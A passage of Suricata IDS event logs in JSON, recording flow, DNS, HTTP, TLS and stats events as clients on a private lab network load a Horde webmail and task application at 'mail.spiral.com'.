checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2429,"failed_udp":114},"tx":{"http":4830,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2511}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2485,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19767,"memcap_state":0,"memcap_global":0},"http":{"memuse":70212,"memcap":0}}} {"timestamp":"2020-02-29T00:21:37.000381+0000","flow_id":996559891170365,"event_type":"flow","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6318,"start":"2020-02-29T00:20:31.623677+0000","end":"2020-02-29T00:20:36.894135+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:37.153346+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344}} {"timestamp":"2020-02-29T00:21:38.000477+0000","flow_id":726707095974901,"event_type":"flow","src_ip":"192.168.10.130","src_port":34894,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":912,"start":"2020-02-29T00:20:31.832501+0000","end":"2020-02-29T00:20:37.027337+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:39.000350+0000","flow_id":2129426219671760,"event_type":"flow","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:38.401616+0000","end":"2020-02-29T00:16:38.507038+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:42.154621+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8575,"tx_id":1}} {"timestamp":"2020-02-29T00:21:44.000206+0000","event_type":"stats","stats":{"uptime":14956,"capture":{"kernel_packets":137630,"kernel_drops":0},"decoder":{"pkts":137636,"bytes":94304976,"invalid":193,"ipv4":136081,"ipv6":10,"ethernet":137636,"raw":0,"null":0,"sll":0,"tcp":130563,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2827,"new_pruned":17,"est_pruned":2486,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19508,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} {"timestamp":"2020-02-29T00:21:44.207478+0000","flow_id":2145609676489439,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:21:45.000312+0000","flow_id":446177012569860,"event_type":"flow","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1459,"bytes_toclient":6323,"start":"2020-02-29T00:20:39.153348+0000","end":"2020-02-29T00:20:44.442845+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:45.000639+0000","flow_id":1224712834032352,"event_type":"flow","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.041696+0000","end":"2020-02-29T00:16:44.146676+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:45.000742+0000","flow_id":1932166962086260,"event_type":"flow","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.262516+0000","end":"2020-02-29T00:16:44.370968+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:47.000606+0000","flow_id":1207103483610682,"event_type":"flow","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":8456,"start":"2020-02-29T00:20:41.460346+0000","end":"2020-02-29T00:20:46.736491+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:48.000454+0000","flow_id":1731686478885927,"event_type":"flow","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:47.177191+0000","end":"2020-02-29T00:16:47.282104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:50.000632+0000","flow_id":1781907531591448,"event_type":"flow","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:49.880408+0000","end":"2020-02-29T00:16:49.985303+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.000375+0000","event_type":"stats","stats":{"uptime":14963,"capture":{"kernel_packets":138419,"kernel_drops":0},"decoder":{"pkts":138443,"bytes":94943524,"invalid":193,"ipv4":136886,"ipv6":10,"ethernet":138443,"raw":0,"null":0,"sll":0,"tcp":131368,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2853,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2869,"synack":2860,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2829,"new_pruned":17,"est_pruned":2489,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} {"timestamp":"2020-02-29T00:21:51.003841+0000","flow_id":1807681630395421,"event_type":"flow","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:50.089117+0000","end":"2020-02-29T00:16:50.197597+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.889868+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9266,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:52.125095+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987}} {"timestamp":"2020-02-29T00:21:52.169203+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":37371,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.174073+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:52.172534+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:21:52.182051+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.182282+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:21:52.177953+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.191682+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.178406+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:21:52.181046+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:21:52.190156+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:21:52.190323+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.237320+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:21:52.237346+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:21:52.237512+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:54.001526+0000","flow_id":2182554981492520,"event_type":"flow","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":13,"bytes_toserver":2320,"bytes_toclient":11098,"start":"2020-02-29T00:20:47.780072+0000","end":"2020-02-29T00:20:53.446700+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:56.266138+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":3}} {"timestamp":"2020-02-29T00:21:56.275652+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28908,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:56.580929+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26101,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 